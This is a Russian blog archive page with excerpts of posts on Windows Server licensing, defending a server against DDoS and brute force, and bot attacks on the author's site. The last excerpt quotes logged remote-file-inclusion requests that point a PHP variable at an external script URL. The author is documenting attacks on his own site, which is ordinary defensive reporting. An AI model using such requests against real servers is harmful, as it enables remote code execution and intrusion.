Архив метки: server

Дилемма

Представьте, что вы приехали на заправку на грузовике, а заправщик вам говорит: “Мы не заправляем один грузовик, мы заправляем минимум 5 грузовиков.”. Звучит как какой-то бред, но именно такова политика лицензирования у компании Microsoft. Я использую Microsoft Windows 2003 Server R2 64bit на домашнем компьютере. Да, я извращенец :), да, мне лень устанавливать Windows 7… Читать далее »

Пограничные войны

Не секрет, что настоящую сильную DDoS-атаку может отбить (отфильтровать) только серьезная железка [магистрального] провайдера. Бороться своими силами (силами серверной ОСи) можно только с небольшими атаками и с разными другими мелкими неприятностями, как то подбор паролей (брутфорс), наплыв нецелевого траффика (китайцев на русский сайт 🙂 ), взлом сайтов и т.п. От наплыва посетителей из нежелательных стран… Читать далее »

Скрипткиды или боты

Хакеры, а точнее скрипткиды, не спят. Несколько дней назад на мой сайт начали проводиться попытки атак запросами, эксплуатирующими старую уязвимость в PHP. /var/log/messages: Oct  4 03:23:34 220 suhosin[28420]: ALERT — tried to register forbidden variable ‘_SERVER[DOCUMENT_ROOT]‘ through GET variables (attacker ‘77.242.37.212‘, file ‘/xxx/domain.tld/index.php’) Пример запроса (из лога апача): 211.111.213.195 — — [05/Oct/2009:08:26:22 +0300] «GET //?_SERVER[DOCUMENT_ROOT]=https://www.hotlinkfiles.com/files/2380695_oajch/IDtest.txt???… Читать далее »